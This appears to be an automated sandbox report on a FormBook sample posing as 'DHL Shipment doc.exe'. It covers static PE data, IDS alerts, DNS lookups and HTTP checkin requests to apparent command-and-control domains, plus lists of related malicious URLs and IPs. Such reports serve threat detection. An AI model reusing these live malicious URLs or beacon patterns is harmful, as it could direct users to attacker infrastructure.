                            • www.my-ela.com/bp3i/?8pjLfJ=v0GHdtb8o&cHkLWBhh=x3Xsx3kH7YI+loo9I35QZMI5K2UCf+f3EJwqw3gCHbahp084XBFwk6JHBTocbu60QHfNn33qWA==
                            PO 1032123 - 1032503.xlsxGet hashmaliciousBrowse
                            • www.my-ela.com/bp3i/?-ZY=g0DPJLJPFVAh&aJE0xXq=x3Xsx3kC7fI6l4kxK35QZMI5K2UCf+f3EJo6s08DD7agpFQ+QRU8y+xFC1ojc+C/Sn3r+A==
                            don.exeGet hashmaliciousBrowse
                            • www.missjeschickt.com/uoe8/?Y4plXns=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&BR=cjlpd
                            O1E623TjjW.exeGet hashmaliciousBrowse
                            • www.missjeschickt.com/uoe8/?hL3=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTy7EwENtz1iBaXiPwQ==&lN68=VTUTzPuXE25p9L
                            NdBLyH2h5d.exeGet hashmaliciousBrowse
                            • www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp
                            2pA9qt1vU4.exeGet hashmaliciousBrowse
                            • www.missjeschickt.com/uoe8/?pRjTvn0p=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&EZW47R=Ib98bPKxhna4
                            RPI_Scanned_30957.docGet hashmaliciousBrowse
                            • www.laurenslatour.com/gypo/?ZVahUNV8=Zpp16v3hBE/ydNxzNUca7g+2/lQ/iuA5hfKDUGzUCcVglizxaFIKYZJEmGSw3WmPDo63ZA==&2dLp=ZXj8X2Kp-2C
                            http://track8989.org/Login.php?websrc=59c275dc2e97dd3b896ed4ff2b82a8fd&dispatched=29&id=586344239Get hashmaliciousBrowse
                            • track8989.org/data/boot.worldwide.mouse.css
                            EMOTET.docGet hashmaliciousBrowse
                            • bellery.fr/eLQlnvwR/
                            EMOTET.docGet hashmaliciousBrowse
                            • bellery.fr/eLQlnvwR/
                            Emotet.docGet hashmaliciousBrowse
                            • bellery.fr/eLQlnvwR/
                            Emotet.docGet hashmaliciousBrowse
                            • bellery.fr/eLQlnvwR/
                            65Payment Cop.exeGet hashmaliciousBrowse
                            • www.threecentopera.com/by/?id=wqZcY8Xqz3HrqhyMYFf/3YK5dxAR85cx/tNAAHia2F9t2q8akOLmvJhh0ArjLduULopTjQrDeMQCXIR3PaAK9w==&sql=1
                            http://bit.do/dL82wGet hashmaliciousBrowse
                            • mijnloginapplherstelprocedurecontrole.ketal.eu/assets/img/favicon.ico

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            www.adwin-estate.comPayment Slip.exeGet hashmaliciousBrowse
                            • 37.140.192.43
                            www.auctions.emailFedEx Documents.exeGet hashmaliciousBrowse
                            • 64.190.62.111

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            STRATOSTRATOAGDEMessage-07022022.xlsmGet hashmaliciousBrowse
                            • 85.214.67.203
                            MES_149.xlsGet hashmaliciousBrowse
                            • 85.214.67.203
                            uLLP5JQDl4.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            report_08022022.xlsGet hashmaliciousBrowse
                            • 85.214.67.203
                            M73uu7dIVa.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            ukoZR9NEJc.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            oHwsazqqz4.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            bLBLLZ.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            Milossd.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            Data73577577.xlsmGet hashmaliciousBrowse
                            • 85.214.67.203
                            Notice0802.xlsmGet hashmaliciousBrowse
                            • 85.214.67.203
                            report 480187140.xlsmGet hashmaliciousBrowse
                            • 85.214.67.203
                            DETAILS-08022022.xlsmGet hashmaliciousBrowse
                            • 85.214.67.203
                            tIq0CYj6Ym.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            E57ulQiwAe.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            pack-0702.xlsmGet hashmaliciousBrowse
                            • 85.214.67.203
                            lpvFWzd2vF.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            h86SjlxQbm.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            aTJAxhQs13.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            VJndf5eO5Z.dllGet hashmaliciousBrowse
                            • 85.214.67.203
                            NBS11696USshipping_doc.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            7bDKLSjI83.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            armv5lGet hashmaliciousBrowse
                            • 64.33.213.171
                            ry1Ogjy3LW.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            SCAMPMT.EXEGet hashmaliciousBrowse
                            • 64.190.62.111
                            7Gvxve2nGj.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            DSS INVITATION.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            n1zBrIn67t.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            REF-NO-SCML121268.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            RFQ_Order_PO_TAE5203E.xlsxGet hashmaliciousBrowse
                            • 64.190.62.111
                            11034485939234.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            shipping_doc_0000000020122021.xlsxGet hashmaliciousBrowse
                            • 64.190.62.111
                            g1STq32s3M.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            J0iq7lHf3R.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            DjdaIUiWIt.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            lBpxJoOTRL.exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            Ppx38Gkyeg.exeGet hashmaliciousBrowse
                            • 64.190.63.136
                            vbc (1).exeGet hashmaliciousBrowse
                            • 64.190.62.111
                            20589647.docGet hashmaliciousBrowse
                            • 64.190.62.111
                            7mA34yRaU1.exeGet hashmaliciousBrowse
                            • 64.190.62.111

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipment doc.exe.log

                            Download File
                            Process:C:\Users\user\Desktop\DHL Shipment doc.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1310
                            Entropy (8bit):5.345651901398759
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                            MD5:D918C6A765EDB90D2A227FE23A3FEC98
                            SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                            SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                            SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                            Malicious:true
                            Reputation:high, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.701844807359983
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:DHL Shipment doc.exe
                            File size:550912
                            MD5:4f0d2852d2aad43eddf9416661933701
                            SHA1:abe4f65cc594a4c217a65486c3025832fe037161
                            SHA256:45469e46b7281b1f1c74cbd1953e47121a233462b7ab0db7b8346c5b7b3dfa1c
                            SHA512:18953eb90af6fe26fab093471379541bbf82b99ec06a586d8d0c7093076921cc971b7d4f627305f3c58eb36cae0d566d00cb38acf130509933eaa6dc78102981
                            SSDEEP:12288:gFJGB4ay527F6OgOvJxgkMWK0EwL8DR4xlIdXl2u:gLmF5/ovx0EwLGyxiJ8
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?Q...................&...>.......D... ...`....@.. ....................................@................................

                            File Icon

                            Icon Hash:88c4e0d2742c5402

                            Static PE Info

                            General

                            Entrypoint:0x48449e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x9CDF513F [Mon May 26 14:03:43 2053 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:v4.0.30319
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x844500x4b.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x38b8.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x843f90x1c.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x824a40x82600False0.861506022291data7.71171540744IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .sdata0x860000x1e80x200False0.861328125data6.62907763275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc0x880000x38b80x3a00False0.914466594828data7.69473198574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x8c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x881300x31edPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                            RT_GROUP_ICON0x8b3200x14data
                            RT_VERSION0x8b3340x398data
                            RT_MANIFEST0x8b6cc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Version Infos

                            DescriptionData
                            Translation0x0000 0x04b0
                            LegalCopyrightCopyright Galaxy Man
                            Assembly Version2.0.0.0
                            InternalNameStaticArrayInitTypeSize40.exe
                            FileVersion5.0.0.0
                            CompanyNameGalaxy Man
                            LegalTrademarks
                            CommentsGhostParty
                            ProductNameGhostParty
                            ProductVersion5.0.0.0
                            FileDescriptionGhostParty
                            OriginalFilenameStaticArrayInitTypeSize40.exe

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            02/08/22-11:23:19.271128TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982580192.168.2.435.213.137.92
                            02/08/22-11:23:19.271128TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982580192.168.2.435.213.137.92
                            02/08/22-11:23:19.271128TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982580192.168.2.435.213.137.92
                            02/08/22-11:23:24.536740TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.464.190.62.111
                            02/08/22-11:23:24.536740TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.464.190.62.111
                            02/08/22-11:23:24.536740TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.464.190.62.111
                            02/08/22-11:23:40.483266TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984580192.168.2.437.140.192.43
                            02/08/22-11:23:40.483266TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984580192.168.2.437.140.192.43
                            02/08/22-11:23:40.483266TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984580192.168.2.437.140.192.43
                            02/08/22-11:23:40.545668TCP1201ATTACK-RESPONSES 403 Forbidden804984537.140.192.43192.168.2.4
                            02/08/22-11:23:45.842049TCP1201ATTACK-RESPONSES 403 Forbidden804984634.102.136.180192.168.2.4

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Feb 8, 2022 11:23:19.088293076 CET4982580192.168.2.435.213.137.92
                            Feb 8, 2022 11:23:19.270664930 CET804982535.213.137.92192.168.2.4
                            Feb 8, 2022 11:23:19.270883083 CET4982580192.168.2.435.213.137.92
                            Feb 8, 2022 11:23:19.271127939 CET4982580192.168.2.435.213.137.92
                            Feb 8, 2022 11:23:19.453187943 CET804982535.213.137.92192.168.2.4
                            Feb 8, 2022 11:23:19.453341007 CET804982535.213.137.92192.168.2.4
                            Feb 8, 2022 11:23:19.453361988 CET804982535.213.137.92192.168.2.4
                            Feb 8, 2022 11:23:19.453528881 CET4982580192.168.2.435.213.137.92
                            Feb 8, 2022 11:23:19.453660965 CET4982580192.168.2.435.213.137.92
                            Feb 8, 2022 11:23:19.635960102 CET804982535.213.137.92192.168.2.4
                            Feb 8, 2022 11:23:24.517915964 CET4983980192.168.2.464.190.62.111
                            Feb 8, 2022 11:23:24.536428928 CET804983964.190.62.111192.168.2.4
                            Feb 8, 2022 11:23:24.536546946 CET4983980192.168.2.464.190.62.111
                            Feb 8, 2022 11:23:24.536740065 CET4983980192.168.2.464.190.62.111
                            Feb 8, 2022 11:23:24.555079937 CET804983964.190.62.111192.168.2.4
                            Feb 8, 2022 11:23:24.565557957 CET804983964.190.62.111192.168.2.4
                            Feb 8, 2022 11:23:24.565593958 CET804983964.190.62.111192.168.2.4
                            Feb 8, 2022 11:23:24.565610886 CET804983964.190.62.111192.168.2.4
                            Feb 8, 2022 11:23:24.565627098 CET804983964.190.62.111192.168.2.4
                            Feb 8, 2022 11:23:24.565803051 CET4983980192.168.2.464.190.62.111
                            Feb 8, 2022 11:23:24.565938950 CET4983980192.168.2.464.190.62.111
                            Feb 8, 2022 11:23:34.646653891 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:34.665153980 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:34.665321112 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:34.665507078 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:34.684036016 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.176575899 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:35.195101023 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.477914095 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.477952957 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.477981091 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.477993011 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:35.478003979 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.478032112 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.478050947 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:35.478058100 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.478081942 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.478101015 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:35.478106976 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.478131056 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.478141069 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:35.478153944 CET804984181.169.145.72192.168.2.4
                            Feb 8, 2022 11:23:35.478168964 CET4984180192.168.2.481.169.145.72
                            Feb 8, 2022 11:23:35.478209972 CET4984180192.168.2.481.169.145.72

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Feb 8, 2022 11:23:08.995383024 CET5653453192.168.2.48.8.8.8
                            Feb 8, 2022 11:23:09.017996073 CET53565348.8.8.8192.168.2.4
                            Feb 8, 2022 11:23:19.058108091 CET5662753192.168.2.48.8.8.8
                            Feb 8, 2022 11:23:19.081427097 CET53566278.8.8.8192.168.2.4
                            Feb 8, 2022 11:23:24.490314960 CET5662153192.168.2.48.8.8.8
                            Feb 8, 2022 11:23:24.516465902 CET53566218.8.8.8192.168.2.4
                            Feb 8, 2022 11:23:29.588390112 CET6311653192.168.2.48.8.8.8
                            Feb 8, 2022 11:23:29.610807896 CET53631168.8.8.8192.168.2.4
                            Feb 8, 2022 11:23:34.621033907 CET6480153192.168.2.48.8.8.8
                            Feb 8, 2022 11:23:34.645180941 CET53648018.8.8.8192.168.2.4
                            Feb 8, 2022 11:23:40.352997065 CET5125553192.168.2.48.8.8.8
                            Feb 8, 2022 11:23:40.418992996 CET53512558.8.8.8192.168.2.4
                            Feb 8, 2022 11:23:45.679106951 CET6152253192.168.2.48.8.8.8
                            Feb 8, 2022 11:23:45.707781076 CET53615228.8.8.8192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Feb 8, 2022 11:23:08.995383024 CET192.168.2.48.8.8.80x1544Standard query (0)www.bbgm4egda.xyzA (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:19.058108091 CET192.168.2.48.8.8.80x1f51Standard query (0)www.metronixmedical.comA (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:24.490314960 CET192.168.2.48.8.8.80x13b7Standard query (0)www.auctions.emailA (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:29.588390112 CET192.168.2.48.8.8.80x5218Standard query (0)www.klopert77.comA (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:34.621033907 CET192.168.2.48.8.8.80x8909Standard query (0)www.solatopotato.comA (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:40.352997065 CET192.168.2.48.8.8.80x7a9Standard query (0)www.adwin-estate.comA (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:45.679106951 CET192.168.2.48.8.8.80x500fStandard query (0)www.webfactory.agencyA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Feb 8, 2022 11:23:09.017996073 CET8.8.8.8192.168.2.40x1544Name error (3)www.bbgm4egda.xyznonenoneA (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:19.081427097 CET8.8.8.8192.168.2.40x1f51No error (0)www.metronixmedical.com35.213.137.92A (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:24.516465902 CET8.8.8.8192.168.2.40x13b7No error (0)www.auctions.email64.190.62.111A (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:29.610807896 CET8.8.8.8192.168.2.40x5218Name error (3)www.klopert77.comnonenoneA (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:34.645180941 CET8.8.8.8192.168.2.40x8909No error (0)www.solatopotato.comsolatopotato.comCNAME (Canonical name)IN (0x0001)
                            Feb 8, 2022 11:23:34.645180941 CET8.8.8.8192.168.2.40x8909No error (0)solatopotato.com81.169.145.72A (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:40.418992996 CET8.8.8.8192.168.2.40x7a9No error (0)www.adwin-estate.com37.140.192.43A (IP address)IN (0x0001)
                            Feb 8, 2022 11:23:45.707781076 CET8.8.8.8192.168.2.40x500fNo error (0)www.webfactory.agencywebfactory.agencyCNAME (Canonical name)IN (0x0001)
                            Feb 8, 2022 11:23:45.707781076 CET8.8.8.8192.168.2.40x500fNo error (0)webfactory.agency34.102.136.180A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • www.metronixmedical.com
                            • www.auctions.email
                            • www.solatopotato.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.44982535.213.137.9280C:\Windows\explorer.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2022 11:23:19.271127939 CET9656OUTGET /how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd HTTP/1.1
                            Host: www.metronixmedical.com
                            Connection: close
                            Data Raw: 00 00 00 00 00 00 00
                            Data Ascii:
                            Feb 8, 2022 11:23:19.453341007 CET9657INHTTP/1.1 301 Moved Permanently
                            Server: nginx
                            Date: Tue, 08 Feb 2022 10:23:19 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: close
                            Location: https://www.metronixmedical.com/how6/?W6vtR=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGUt6OvGQoWpI&pN6=9ri0dbnPLFLdd
                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                            X-HTTPS-Enforce: 1
                            X-Proxy-Cache-Info: DT:1
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.44983964.190.62.11180C:\Windows\explorer.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2022 11:23:24.536740065 CET9687OUTGET /how6/?W6vtR=0inXDaq5MxudMpH6GZOYsbvs/BtQ0SlGgc0yMNKfti2SPFqDmOiUae5rQ5wMEYlWCo0z&pN6=9ri0dbnPLFLdd HTTP/1.1
                            Host: www.auctions.email
                            Connection: close
                            Data Raw: 00 00 00 00 00 00 00
                            Data Ascii:
                            Feb 8, 2022 11:23:24.565557957 CET9689INHTTP/1.1 200 OK
                            date: Tue, 08 Feb 2022 10:23:24 GMT
                            content-type: text/html; charset=UTF-8
                            transfer-encoding: chunked
                            vary: Accept-Encoding
                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            pragma: no-cache
                            last-modified: Tue, 08 Feb 2022 10:23:24 GMT
                            x-cache-miss-from: parking-555544c6d6-v9qmr
                            server: NginX
                            connection: close
